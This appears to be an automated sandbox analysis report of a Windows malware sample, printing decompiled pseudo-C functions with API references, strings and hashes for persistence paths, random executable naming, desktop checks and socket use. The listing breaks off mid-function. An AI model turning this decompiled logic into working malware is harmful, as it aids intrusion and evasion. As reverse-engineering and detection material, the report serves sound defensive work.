0x004161a2
0x004161a8
0x004161a8
0x004161af

APIs

Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 004161A2

Strings

.exe, xrefs: 0041608C
bcdfghklmnpqrstvwxz, xrefs: 004160A0
aeiouy, xrefs: 004160AF, 004160B8, 004160F0, 004160F9

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: a8d09f88985c50193b103d0d792469a4c88ea91ab3fc87b2baf780b2572740b7
Instruction ID: 6239e78a5a9a1b5f0950657de931472cef4cd21e15ea04d74ec5885d045acbf0
Opcode Fuzzy Hash: a8d09f88985c50193b103d0d792469a4c88ea91ab3fc87b2baf780b2572740b7
Instruction Fuzzy Hash: 3D319A71E00219BBCB10DFA9C4452FEBBB5EF44345F56846BD811AB382D379DA81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409188, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00409188(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00411DB1( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E00419897(_t28,  &_v116);
				_t30 = 0x61;
				E00419897(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E00415E26(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00408F40(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00411CFE(_v12);
					}
					_push(0xcb);
					return E00407DEB(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E00419897(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E00417437( &_v636,  &_v16, _t68, 1, 2, E00408F9A,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00409188
0x00409188
0x0040919d
0x004091a7
0x004091a8
0x004091b2
0x004091b3
0x004091c6
0x004091d1
0x004091d9
0x004091db
0x004091dd
0x004091ea
0x004091fb
0x004091fb
0x004091dd
0x00409203
0x0040926b
0x0040926b
0x00000000
0x00409282
0x00409270
0x00000000
0x00409205
0x00409207
0x0040920a
0x0040920b
0x00409212
0x00409219
0x00409220
0x00409227
0x0040922a
0x0040922c
0x0040922c
0x0040923a
0x00409240
0x00409242
0x00409254
0x0040925d
0x0040925d
0x00409262
0x00409263
0x00409268
0x00000000
0x00409268

APIs

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004091EA
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040923A

Strings

&, xrefs: 00409220
#, xrefs: 00409212

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 43538cafdd8c9a33fbe7bf09d678f73140996fc91666c8b6601cdf5ccba15883
Instruction ID: e262041236586c3b82cfe444529a9ebe07c4a5474d135b33634015b1bae7a53a
Opcode Fuzzy Hash: 43538cafdd8c9a33fbe7bf09d678f73140996fc91666c8b6601cdf5ccba15883
Instruction Fuzzy Hash: C0316FB2D00218BADF10ABA09C89EDE777CEB44308F1049ABF601F7191D6785E858B94

Uniqueness

Uniqueness Score: -1.00%

Function 00409A38, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00409A38(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00411DB1( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E00419897(_t28,  &_v120);
				_t30 = 0x78;
				E00419897(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E00415E26(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E004097DB(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00411CFE(_v12);
					}
					_push(0xcb);
					return E00407DEB(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E00419897(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E00417437( &_v644,  &_v16, _t68, 1, 2, E00409813,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00409a38
0x00409a38
0x00409a4d
0x00409a57
0x00409a58
0x00409a62
0x00409a63
0x00409a76
0x00409a81
0x00409a89
0x00409a8b
0x00409a8d
0x00409a9a
0x00409aab
0x00409aab
0x00409a8d
0x00409ab3
0x00409b1b
0x00409b1b
0x00000000
0x00409b32
0x00409b20
0x00000000
0x00409ab5
0x00409ab7
0x00409aba
0x00409abb
0x00409ac2
0x00409ac9
0x00409ad0
0x00409ad7
0x00409ada
0x00409adc
0x00409adc
0x00409aea
0x00409af0
0x00409af2
0x00409b04
0x00409b0d
0x00409b0d
0x00409b12
0x00409b13
0x00409b18
0x00000000
0x00409b18

APIs

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 00409A9A
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00409AEA

Strings

&, xrefs: 00409AC9
#, xrefs: 00409AD0

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 9fded5c4d8259019fc4f62279f25682ee29fe94f3ac7c4379ef7620eeb378ab7
Instruction ID: 1e275e509e97a07c248b217a8456c392d5b0c613d2968b29449a098f745697d2
Opcode Fuzzy Hash: 9fded5c4d8259019fc4f62279f25682ee29fe94f3ac7c4379ef7620eeb378ab7
Instruction Fuzzy Hash: 303171B2D00218AADF10EBE19C85EDE777CEB44314F10457BF605F7181DA786E858B94

Uniqueness

Uniqueness Score: -1.00%

Function 00414EFA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

#16.WS2_32(?,?,00000400,00000000), ref: 00414F43
#19.WS2_32(?,?,00000000,00000000), ref: 00414F5D
#18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00414F9A

Strings

Q@, xrefs: 00414EFA

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: Q@
API String ID: 0-309375607
Opcode ID: 669b38c90977364344fa68dbde67a447bc5ff8cae6e1e766b1292d1272690bfb
Instruction ID: 4ed5e21baf27a28e9a33fc1ce4cad0704f5d8dcab4dee7a6c8926cd62f298e29
Opcode Fuzzy Hash: 669b38c90977364344fa68dbde67a447bc5ff8cae6e1e766b1292d1272690bfb
Instruction Fuzzy Hash: 7E1137B18102289BEB20DF25DD84ADE7BB8FB89350F20446AF91DD3351D7349986CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC0D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BC0D(void* __edx) {
				long _v8;
				char _v116;
				void _v220;
				void* __esi;
				void* _t8;
				void* _t12;
				void* _t18;

				_t18 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
					if(_t8 != 0 && _v8 == 0x4e) {
						E0041C9FB(0x2937498d,  &_v116, 0);
						_t8 = E00411D6F( &_v116,  &_v220, 0x4c);
						if(_t8 == 0) {
							_t12 = E0040B81B( &_v220, _t18, 0x422918, _t8);
							if(_t12 == 0) {
								return E0040BA86(0x422918, 0);
							}
							 *0x423b60 =  *0x423b60 | 0x00000004;
							return _t12;
						}
					}
				}
				return _t8;
			}

0x0040bc0d
0x0040bc1e
0x0040bc26
0x0040bc38
0x0040bc40
0x0040bc53
0x0040bc63
0x0040bc6a
0x0040bc72
0x0040bc79
0x00000000
0x0040bc88
0x0040bc7b
0x00000000
0x0040bc7b
0x0040bc6a
0x0040bc40
0x0040bc8f

APIs

GetCurrentThreadId.KERNEL32 ref: 0040BC17
GetThreadDesktop.USER32(00000000), ref: 0040BC1E
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,0041C5C2), ref: 0040BC38

Part of subcall function 0040B81B: TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834

Strings

N, xrefs: 0040BC42

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: 94caacae322e2b563328b01be1e37baa03e5f5028285f365ba9a3b4efdd36237
Instruction ID: b1951342a9d2f1b379f158a7c499fd442bad6f30b26e5f35d6b8130eb96e74e5
Opcode Fuzzy Hash: 94caacae322e2b563328b01be1e37baa03e5f5028285f365ba9a3b4efdd36237
Instruction Fuzzy Hash: E701A770604205AAFB20EFA59D56FAA336CEB00704F40017EF946B31D1DF789A45CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00407101, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407101(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				void* __esi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x4223a8 == 0) {
					E0041CD51(__ecx, 0x4223a8, 0x4225b0, 2);
					 *((short*)(E00411D3A(0x4225b0, 0x4223a8, E0041284D(0x4223a8) + _t10) + 0x4225b0)) = 0;
					_t3 = PathRemoveFileSpecW(0x4225b0);
				}
				if(_t13 != 0) {
					E0041209F(_t3 | 0xffffffff, 0x4223a8, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x423dcc > 1) {
					E00417315(0x4225b0);
					E0041537F(0x4225b0);
					_t3 = GetFileAttributesW(0x4223a8);
					if(_t3 != 0xffffffff) {
						return E0041537F(0x4223a8);
					}
				}
				return _t3;
			}

0x00407101
0x00407115
0x00407119
0x00407132
0x00407139
0x00407139
0x00407141
0x0040714a
0x00407155
0x00407155
0x00407160
0x0040716c
0x00407172
0x00407178
0x00407181
0x00000000
0x00407184
0x00407181
0x0040718b

APIs

PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 00407139
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,?,?), ref: 00407155
GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,?), ref: 00407178

Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC

Strings

.tmp, xrefs: 0040714F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: 1fe4f782841b6bc58846894f5ba2667a72a9466d1ffad5b01ccc01e22ab20750
Instruction ID: 3ae55c7824cd0ad779c477201d9995ee0ce474b89286fe7db70deb23f79f1f09
Opcode Fuzzy Hash: 1fe4f782841b6bc58846894f5ba2667a72a9466d1ffad5b01ccc01e22ab20750
Instruction Fuzzy Hash: A2F0A230F042107AD22137365D49ABF29595F91724F44463FF825B62F2CBBC5882826E

Uniqueness

Uniqueness Score: -1.00%

Function 0041710E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041710E(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E00413037());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E004129F1(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E00417593(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x00417131
0x00417187
0x00000000
0x00417187
0x00417133
0x00417135
0x0041713a
0x0041713b
0x0041714a
0x00417150
0x00417155
0x0041715b
0x00000000
0x00000000
0x00417170
0x00417181
0x00417185
0x00000000
0x00000000
0x00000000
0x0041718f
0x00000000
0x0041718f
0x00417170
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 00417125

Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00417177

Strings

%s%08x, xrefs: 00417140
tmp, xrefs: 0041713B

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 8f3245e94b748fc8fc34958ba61d24872ebf0d181fec2e5ebf8f9a1c04083712
Instruction ID: 25647cd77b7035d364a82bd953024552736e9361de7969b605218639ad23ac18
Opcode Fuzzy Hash: 8f3245e94b748fc8fc34958ba61d24872ebf0d181fec2e5ebf8f9a1c04083712
Instruction Fuzzy Hash: 78F0F4F628821476DB206A248C45BEB37699B05754F100132FA51E62E1D27C8ED6969C

Uniqueness

Uniqueness Score: -1.00%

Function 00417315, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417315(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x00417317
0x0041731e
0x00417326
0x0041732a
0x0041732c
0x0041732c
0x0041732e
0x0041732e
0x00417334
0x00000000
0x00000000
0x0041736c
0x0041736c
0x00000000
0x00417340
0x00417340
0x00417345
0x00417351
0x0041735c
0x0041735c
0x00417362
0x00417376
0x00417379
0x00417364
0x00417367
0x00417371
0x00000000
0x00417371
0x00417369
0x00000000
0x00417369
0x00417362

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00411520,?,?,?,?,?), ref: 00417320
GetFileAttributesW.KERNEL32(?,?,00000000,00411520,?,?,?,?,?), ref: 00417348
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00411520,?,?,?,?,?), ref: 00417356

Strings

.exe, xrefs: 0041731C

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 05ba98d73cc3fc5f35df1dd188fbee6b26a8c142603325ee16ad39213cebcba3
Instruction ID: 3c020cabd657920e8211c973beb599ef1ec31f652935267262497f16ef1b3cf5
Opcode Fuzzy Hash: 05ba98d73cc3fc5f35df1dd188fbee6b26a8c142603325ee16ad39213cebcba3
Instruction Fuzzy Hash: 63F0FC3558821C56C6300B255C49AFBB3B99E41BA0B651527FDB1D7360D738ACC1F26C

Uniqueness

Uniqueness Score: -1.00%

Function 00413505, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413505(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00413509
0x00413512
0x0041351a
0x0041353c
0x00413544
0x0041351c
0x00413522
0x0041352a
0x00000000
0x0041352c
0x00413532
0x00413536
0x00000000
0x00413538
0x0041353b
0x0041353b
0x00413536
0x0041352a

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041C2F5,00000000,0041C81E), ref: 00413512
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00413522

Strings

IsWow64Process, xrefs: 0041351C
kernel32.dll, xrefs: 0041350D

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: fe4f8119948997e644b120d3f83256ffff137e24f1d3dc27fde33818e43c96cd
Instruction ID: 2a01c0ad85ca5ef5d5d4dd11bea83a1c2ae38e8da002b0acd0ca78dc835b2ce4
Opcode Fuzzy Hash: fe4f8119948997e644b120d3f83256ffff137e24f1d3dc27fde33818e43c96cd
Instruction Fuzzy Hash: DAE04831600345B6DF105FA5AD06B9F779C5B11B97F5402A9A411F21D0D6B8DB449928

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E4FB(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;
				intOrPtr _t9;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x422aa4);
					_t7 = E0040DEC2(_a4);
					if(_t7 != 0xffffffff) {
						_t9 =  *0x422abc; // 0x0
						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
					}
					LeaveCriticalSection(0x422aa4);
					return _t7;
				}
				return _t6;
			}

0x0040e500
0x0040e511
0x0040e51b
0x0040e523
0x0040e525
0x0040e532
0x0040e532
0x0040e539
0x00000000
0x0040e540
0x0040e541

APIs

EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E511
SetEvent.KERNEL32(?), ref: 0040E532
LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E539

Strings

3, xrefs: 0040E502

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 0c5fc4d82de9dc5dc7288d01ef4836a685593fc7398a8f93c7069808be55a682
Instruction ID: 06ccc24f6bec2e7c4b9925a03029b0e7aced5ea6c591ae27693f05a05bdf8d2b
Opcode Fuzzy Hash: 0c5fc4d82de9dc5dc7288d01ef4836a685593fc7398a8f93c7069808be55a682
Instruction Fuzzy Hash: 64E06531100100BFC7246B55ED4886AB764DBD6339705C93FF116B61B0D7388852CA59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFFC, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0041AFFC(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0041787A( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E00411CFE(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0041ACD9(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E00411DB1( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E0041215C(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E0041215C(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E0041215C(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E0041215C(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E0041BF3C( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00411D51(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E0041BF13( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E0041BF13( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
